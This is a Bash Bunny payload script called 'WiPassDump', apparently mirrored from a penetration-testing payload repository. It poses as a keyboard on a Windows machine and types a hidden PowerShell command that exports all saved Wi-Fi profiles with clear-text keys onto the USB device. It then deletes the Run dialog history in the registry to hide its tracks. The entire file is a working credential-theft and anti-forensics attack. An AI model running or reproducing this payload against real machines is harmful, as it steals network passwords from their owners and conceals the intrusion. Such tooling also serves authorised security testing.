mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
56 lines
1.2 KiB
Plaintext
Executable File
56 lines
1.2 KiB
Plaintext
Executable File
# Title: WiPassDump
|
|
# Author: jafahulo -- Cred: samdeg555, hak5darren
|
|
# Version: 2.0
|
|
# Target: Windows
|
|
#
|
|
# Runs powershell script to dump clear text passwords to \loot\WiPassDump
|
|
# Runs powershell script to remove "run" prompt history - creds for this go to hak5darren.
|
|
#
|
|
# Red Blinking..........Running
|
|
# Blue Blinking.........Removing tracks
|
|
# Green.................Finished
|
|
################################################
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# Create directory under loot to store passwords in
|
|
mkdir -p /root/udisk/loot/WiPassDump
|
|
|
|
LED R 200
|
|
|
|
# Open windows run console
|
|
|
|
Q GUI r
|
|
Q DELAY 1000
|
|
|
|
# enter payload and execute
|
|
|
|
Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; cd \$bunny\\loot\\WiPassDump\; netsh wlan export profile key=clear
|
|
Q ENTER
|
|
|
|
#Let code run, then sync
|
|
|
|
Q DELAY 5000
|
|
|
|
sync
|
|
|
|
# Wait for misc. to happen on computer
|
|
|
|
Q DELAY 1000
|
|
|
|
# Hide tracks
|
|
|
|
LED B 500
|
|
|
|
QUACK GUI r
|
|
QUACK DELAY 1000
|
|
QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
|
QUACK ENTER
|
|
|
|
QUACK DELAY 1000
|
|
|
|
# Done!
|
|
|
|
LED G
|
|
|